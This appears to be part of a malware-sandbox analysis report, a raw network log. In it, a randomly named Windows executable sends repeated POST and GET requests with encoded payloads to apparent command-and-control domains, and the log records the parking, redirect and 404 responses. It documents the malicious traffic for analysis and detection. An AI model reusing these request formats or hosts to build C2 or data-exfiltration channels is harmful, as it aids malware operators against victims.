                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                      Dec 17, 2024 08:24:49.495171070 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDBmNWQwZTItMDk3My00NTdkLWFkOTQtZTcxYzZlZDYwMTUyIiwicGFnZV90aW1lIjoxNzM0NDIwMj


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.849722199.59.243.227805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:24:51.068139076 CET471OUTGET /cfcv/?rPh=yFDcd28s49uqEHKp5gxZDHehDMkbx8O5HFlFfS4Td0kedo/+sd9J73ZTBpR3wC1xC+DY+jWyDKbAELqR1mf/RFpqWmAJN7Naqf7NuMxlktjiSvXKA5GjZW5lR8Lr/Dnajw==&kVvpD=Bx4T HTTP/1.1
                                                      Host: www.969-usedcar02.shop
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Dec 17, 2024 08:24:52.154082060 CET1236INHTTP/1.1 200 OK
                                                      date: Tue, 17 Dec 2024 07:24:51 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1494
                                                      x-request-id: 15213926-21b5-4e11-a91c-e337af67e730
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CxPuwGbXAblLI5H6YbYdON4qTdkZiWWrhmdmFQcwFDUDwDKJbGnZdu3dKihJU81NmCphm6MCf/SyZ7qfZVejAg==
                                                      set-cookie: parking_session=15213926-21b5-4e11-a91c-e337af67e730; expires=Tue, 17 Dec 2024 07:39:51 GMT; path=/
                                                      connection: close
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 78 50 75 77 47 62 58 41 62 6c 4c 49 35 48 36 59 62 59 64 4f 4e 34 71 54 64 6b 5a 69 57 57 72 68 6d 64 6d 46 51 63 77 46 44 55 44 77 44 4b 4a 62 47 6e 5a 64 75 33 64 4b 69 68 4a 55 38 31 4e 6d 43 70 68 6d 36 4d 43 66 2f 53 79 5a 37 71 66 5a 56 65 6a 41 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CxPuwGbXAblLI5H6YbYdON4qTdkZiWWrhmdmFQcwFDUDwDKJbGnZdu3dKihJU81NmCphm6MCf/SyZ7qfZVejAg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                      Dec 17, 2024 08:24:52.154126883 CET947INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTUyMTM5MjYtMjFiNS00ZTExLWE5MWMtZTMzN2FmNjdlNzMwIiwicGFnZV90aW1lIjoxNzM0NDIwMj


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.8497238.136.96.106805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:24:58.354867935 CET736OUTPOST /b6bc/ HTTP/1.1
                                                      Host: www.juewucangku.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-us
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Content-Length: 204
                                                      Connection: close
                                                      Origin: http://www.juewucangku.xyz
                                                      Referer: http://www.juewucangku.xyz/b6bc/
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Data Raw: 72 50 68 3d 38 71 70 34 59 68 46 58 67 38 4e 4c 69 32 67 4d 4c 76 76 35 67 6a 6e 6c 50 51 2b 41 66 46 55 6e 4a 49 54 79 4c 4a 61 67 6f 6f 67 78 6b 4e 5a 77 36 30 2b 79 65 52 32 34 54 6c 73 6b 35 47 65 67 57 4a 34 6e 72 41 62 4a 67 43 53 6d 66 66 66 5a 6c 50 59 2b 67 65 2b 52 54 56 30 61 4f 38 71 4f 42 57 74 32 6e 76 41 56 31 70 6d 62 62 6a 49 70 73 58 75 70 6f 67 36 6d 7a 61 36 53 31 56 51 72 6a 76 79 4a 51 44 5a 30 38 47 54 31 69 62 49 2b 6d 62 6d 35 56 46 4c 57 4d 74 74 43 47 66 34 34 54 6a 41 57 4e 43 4f 38 73 4b 66 67 6c 47 32 75 47 51 66 4f 43 50 71 4e 53 7a 57 45 78 71 79 39 59 50 2f 6b 6b 78 73 3d
                                                      Data Ascii: rPh=8qp4YhFXg8NLi2gMLvv5gjnlPQ+AfFUnJITyLJagoogxkNZw60+yeR24Tlsk5GegWJ4nrAbJgCSmfffZlPY+ge+RTV0aO8qOBWt2nvAV1pmbbjIpsXupog6mza6S1VQrjvyJQDZ08GT1ibI+mbm5VFLWMttCGf44TjAWNCO8sKfglG2uGQfOCPqNSzWExqy9YP/kkxs=
                                                      Dec 17, 2024 08:24:59.858557940 CET403INHTTP/1.1 301 Moved Permanently
                                                      Server: nginx
                                                      Date: Tue, 17 Dec 2024 07:24:59 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 162
                                                      Connection: close
                                                      Location: https://www.juewucangku.xyz/b6bc/
                                                      Strict-Transport-Security: max-age=31536000
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.8497248.136.96.106805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:25:01.028673887 CET756OUTPOST /b6bc/ HTTP/1.1
                                                      Host: www.juewucangku.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-us
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Content-Length: 224
                                                      Connection: close
                                                      Origin: http://www.juewucangku.xyz
                                                      Referer: http://www.juewucangku.xyz/b6bc/
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Data Raw: 72 50 68 3d 38 71 70 34 59 68 46 58 67 38 4e 4c 77 43 6b 4d 4d 49 62 35 33 54 6e 69 52 67 2b 41 51 6c 55 6a 4a 49 66 79 4c 49 65 77 6f 62 55 78 6c 74 70 77 31 52 65 79 64 52 32 34 62 46 73 68 39 47 65 72 57 4a 39 53 72 46 6a 4a 67 43 47 6d 66 64 33 5a 6c 34 4d 35 67 4f 2b 54 47 46 30 55 4b 38 71 4f 42 57 74 32 6e 75 6c 77 31 70 2b 62 61 53 34 70 74 31 57 71 68 41 36 6e 35 36 36 53 78 56 52 69 6a 76 79 52 51 43 31 53 38 41 58 31 69 66 4d 2b 6d 76 53 36 66 46 4c 51 43 4e 73 57 42 76 46 64 4c 55 63 68 45 52 36 61 6e 4c 2f 61 67 77 48 45 63 79 58 49 42 50 43 6d 53 77 2b 79 30 64 76 56 43 73 76 55 36 6d 37 2f 69 4c 7a 77 79 58 4c 50 51 4d 56 43 37 56 69 58 4b 65 63 6a
                                                      Data Ascii: rPh=8qp4YhFXg8NLwCkMMIb53TniRg+AQlUjJIfyLIewobUxltpw1ReydR24bFsh9GerWJ9SrFjJgCGmfd3Zl4M5gO+TGF0UK8qOBWt2nulw1p+baS4pt1WqhA6n566SxVRijvyRQC1S8AX1ifM+mvS6fFLQCNsWBvFdLUchER6anL/agwHEcyXIBPCmSw+y0dvVCsvU6m7/iLzwyXLPQMVC7ViXKecj
                                                      Dec 17, 2024 08:25:02.518285990 CET403INHTTP/1.1 301 Moved Permanently
                                                      Server: nginx
                                                      Date: Tue, 17 Dec 2024 07:25:02 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 162
                                                      Connection: close
                                                      Location: https://www.juewucangku.xyz/b6bc/
                                                      Strict-Transport-Security: max-age=31536000
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.8497258.136.96.106805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:25:03.714528084 CET1773OUTPOST /b6bc/ HTTP/1.1
                                                      Host: www.juewucangku.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-us
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1240
                                                      Connection: close
                                                      Origin: http://www.juewucangku.xyz
                                                      Referer: http://www.juewucangku.xyz/b6bc/
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Data Raw: 72 50 68 3d 38 71 70 34 59 68 46 58 67 38 4e 4c 77 43 6b 4d 4d 49 62 35 33 54 6e 69 52 67 2b 41 51 6c 55 6a 4a 49 66 79 4c 49 65 77 6f 61 73 78 6c 66 68 77 36 51 65 79 63 52 32 34 52 6c 73 67 39 47 65 32 57 4a 46 65 72 46 66 7a 67 42 2b 6d 66 38 58 5a 73 70 4d 35 7a 75 2b 54 65 31 30 56 4f 38 71 66 42 57 39 79 6e 75 31 77 31 70 2b 62 61 51 67 70 39 58 75 71 74 67 36 6d 7a 61 36 67 31 56 51 4c 6a 76 36 76 51 43 42 6b 39 77 33 31 6a 2f 63 2b 6b 36 6d 36 54 46 4c 53 42 4e 73 65 42 76 4a 4f 4c 51 45 74 45 52 2b 67 6e 49 76 61 68 6d 57 2b 59 68 6e 35 58 4f 71 4c 61 69 43 50 30 38 6e 66 63 64 48 69 6c 30 2b 51 30 2b 72 72 39 31 48 79 66 76 52 47 68 42 79 2b 47 70 78 63 59 30 38 43 52 4f 36 61 75 7a 42 76 69 72 4e 33 70 4b 63 4a 50 4e 4a 52 53 4c 43 73 4e 52 72 77 36 61 67 4a 71 48 4c 53 2b 41 78 77 64 54 45 33 6d 72 79 73 73 42 45 50 36 67 45 69 50 42 6d 74 67 4f 61 32 56 76 53 42 4e 6a 44 6b 65 53 4c 4d 5a 7a 61 53 50 45 48 55 43 63 32 65 5a 48 77 30 39 7a 58 61 38 6c 35 63 4b 71 6d 47 61 76 39 41 6e 43 [TRUNCATED]
                                                      Data Ascii: rPh=8qp4YhFXg8NLwCkMMIb53TniRg+AQlUjJIfyLIewoasxlfhw6QeycR24Rlsg9Ge2WJFerFfzgB+mf8XZspM5zu+Te10VO8qfBW9ynu1w1p+baQgp9Xuqtg6mza6g1VQLjv6vQCBk9w31j/c+k6m6TFLSBNseBvJOLQEtER+gnIvahmW+Yhn5XOqLaiCP08nfcdHil0+Q0+rr91HyfvRGhBy+GpxcY08CRO6auzBvirN3pKcJPNJRSLCsNRrw6agJqHLS+AxwdTE3mryssBEP6gEiPBmtgOa2VvSBNjDkeSLMZzaSPEHUCc2eZHw09zXa8l5cKqmGav9AnC8IDfBlCiD6M0wC5Jzbn9dHxjHSu1xZt1W2BWEIiC2jWYuh3m85dnh/RCM5T95u2wnf8+kgRmxRkwpbzIAuFR0mJdElzRWvgZ8vK6ZfraBEfCpl+EMXZgrnoCSDelX8dLg/d/Pv9yx6gWSmfQuOqZWbmZ2r2l/ytZZ/S6Jd5CMzMArzjxvTGy66LDofQGUFKvdGCYVXoSN6vbNpy228Q49L3yood5DKl/pogwFkaodG/VwNxUxyvLy+ZEVzsxtfTCvC3Za71QTO8awPPyxrZWLYtQ9jFpQftNCknegjSqwQQPi5nrItViEmtiuFDNWI+kpkWteVxdHMkh+Fo1/AxOCVVr25kdArE3G53EKNUcOwRW8BQ1d6vOja0h1gpRQTTFaotfiYTCbOs758U6EvShITuh/c2ZRIDOu5uOjLPcrMd1MvtZeq7+K9bCn0olV5/By36XajqXh5mXKVd03Bgx0/rorsM4BONfGSI2gmBpEmCrflRC424xoGvopHTz6a/oj1vhU+OYmf3bI8pS6j4CXACwcjJY/mrfljShlurrbnWU89CZEF3m7u4Oa8SL0MCPm2c0OM4u0FmsDwN0TScZvIED+oc63g2JvEROdcV8d7EDPKM4/n5vctE9VFdT38WRhC4jCILqNTPcDKTstxhQVb+XubTo+Dm6Vz [TRUNCATED]
                                                      Dec 17, 2024 08:25:05.224736929 CET403INHTTP/1.1 301 Moved Permanently
                                                      Server: nginx
                                                      Date: Tue, 17 Dec 2024 07:25:04 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 162
                                                      Connection: close
                                                      Location: https://www.juewucangku.xyz/b6bc/
                                                      Strict-Transport-Security: max-age=31536000
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.8497268.136.96.106805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:25:06.384931087 CET468OUTGET /b6bc/?rPh=xoBYbUYuit1npWAwAtyehE3iQkiUZWMjRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUA0uykY2c1YtOuNjF0odUunu7vTTMkkGOdpFXJ3f6l6FBu5A==&kVvpD=Bx4T HTTP/1.1
                                                      Host: www.juewucangku.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Dec 17, 2024 08:25:07.905020952 CET551INHTTP/1.1 301 Moved Permanently
                                                      Server: nginx
                                                      Date: Tue, 17 Dec 2024 07:25:07 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 162
                                                      Connection: close
                                                      Location: https://www.juewucangku.xyz/b6bc/?rPh=xoBYbUYuit1npWAwAtyehE3iQkiUZWMjRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUA0uykY2c1YtOuNjF0odUunu7vTTMkkGOdpFXJ3f6l6FBu5A==&kVvpD=Bx4T
                                                      Strict-Transport-Security: max-age=31536000
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.84972769.57.163.64805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:25:13.540319920 CET745OUTPOST /9er8/ HTTP/1.1
                                                      Host: www.startsomething.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-us
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Content-Length: 204
                                                      Connection: close
                                                      Origin: http://www.startsomething.xyz
                                                      Referer: http://www.startsomething.xyz/9er8/
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Data Raw: 72 50 68 3d 2f 32 78 77 5a 6c 65 2b 67 4d 77 73 42 2f 76 4e 38 35 45 71 72 74 2b 74 31 66 73 62 41 4c 4a 57 6a 2b 61 75 45 55 69 70 33 69 30 69 6d 4d 6c 4c 43 38 46 4a 35 68 6c 46 33 61 59 32 33 65 51 2f 57 44 77 54 73 6b 71 6c 75 53 47 34 5a 6d 4d 58 42 47 67 6f 45 6d 5a 75 34 67 38 5a 61 31 34 72 35 70 4a 6c 47 62 74 32 2b 70 31 55 4b 79 59 79 62 35 48 52 65 36 6d 5a 73 37 67 59 52 64 69 54 59 31 51 72 66 6b 51 66 55 63 72 76 79 37 7a 74 49 61 43 76 66 73 67 46 4c 53 42 73 30 4f 66 56 4b 6a 68 48 6b 73 59 42 59 4f 79 43 39 43 71 4b 43 61 6b 61 49 64 64 44 6d 39 43 51 6f 73 33 35 55 51 39 4b 61 44 63 3d
                                                      Data Ascii: rPh=/2xwZle+gMwsB/vN85Eqrt+t1fsbALJWj+auEUip3i0imMlLC8FJ5hlF3aY23eQ/WDwTskqluSG4ZmMXBGgoEmZu4g8Za14r5pJlGbt2+p1UKyYyb5HRe6mZs7gYRdiTY1QrfkQfUcrvy7ztIaCvfsgFLSBs0OfVKjhHksYBYOyC9CqKCakaIddDm9CQos35UQ9KaDc=
                                                      Dec 17, 2024 08:25:14.760078907 CET533INHTTP/1.1 404 Not Found
                                                      Date: Tue, 17 Dec 2024 07:25:14 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.84972869.57.163.64805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:25:16.203038931 CET765OUTPOST /9er8/ HTTP/1.1
                                                      Host: www.startsomething.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-us
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Content-Length: 224
                                                      Connection: close
                                                      Origin: http://www.startsomething.xyz
                                                      Referer: http://www.startsomething.xyz/9er8/
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Data Raw: 72 50 68 3d 2f 32 78 77 5a 6c 65 2b 67 4d 77 73 54 4f 66 4e 2b 65 77 71 73 4e 2b 79 72 50 73 62 4f 72 4a 53 6a 2f 6d 75 45 56 58 75 33 51 67 69 68 75 74 4c 51 6f 5a 4a 36 68 6c 46 75 71 59 75 35 2b 51 4b 57 44 30 74 73 6c 57 6c 75 53 53 34 5a 6a 77 58 42 57 63 70 46 32 5a 73 68 51 38 62 58 56 34 72 35 70 4a 6c 47 62 34 52 2b 70 74 55 4a 43 6f 79 5a 59 48 57 51 61 6d 61 6b 62 67 59 56 64 69 66 59 31 52 4d 66 67 77 6c 55 65 6a 76 79 2f 33 74 49 4a 61 73 56 73 68 41 42 79 41 53 31 74 47 4e 50 54 52 64 73 71 63 7a 59 39 4f 47 38 30 62 67 59 34 73 63 4c 64 31 6f 6d 2b 71 6d 74 62 71 52 4f 7a 74 36 45 55 4c 5a 73 39 55 64 69 79 61 71 51 45 77 2f 4b 70 50 49 63 70 5a 56
                                                      Data Ascii: rPh=/2xwZle+gMwsTOfN+ewqsN+yrPsbOrJSj/muEVXu3QgihutLQoZJ6hlFuqYu5+QKWD0tslWluSS4ZjwXBWcpF2ZshQ8bXV4r5pJlGb4R+ptUJCoyZYHWQamakbgYVdifY1RMfgwlUejvy/3tIJasVshAByAS1tGNPTRdsqczY9OG80bgY4scLd1om+qmtbqROzt6EULZs9UdiyaqQEw/KpPIcpZV
                                                      Dec 17, 2024 08:25:17.424590111 CET533INHTTP/1.1 404 Not Found
